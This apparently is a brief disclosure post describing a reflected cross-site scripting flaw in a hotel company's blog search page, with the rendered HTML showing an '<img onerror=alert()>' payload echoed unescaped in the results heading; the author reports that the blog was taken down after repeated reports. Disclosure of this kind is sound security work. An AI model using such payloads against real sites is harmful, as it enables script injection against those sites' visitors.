XSS vulnerability through search results page.
The search query is sent as a GET parameter and is escaped almost everywhere on the page, except for the heading as shown below, this allows code to be rendered directly from a malicious URL.
<h1>No Results for <img src=bob onerror=alert()></h1> <form class="search_results_form" method="get" id="searchform" action="http://blog.hyatt.com/"> <input class="textbox_search" type="search" value="<img src=bob onerror=alert()>" name="s" id="s" /> <input class="button_search" type="submit" id="searchsubmit" value="Search" /> </form>
Since I reported this a number of times, they have removed the entire blog. Bit of an extreme response. It is still linked from their homepage so not sure if it will be coming back without XSS vulnerabilities.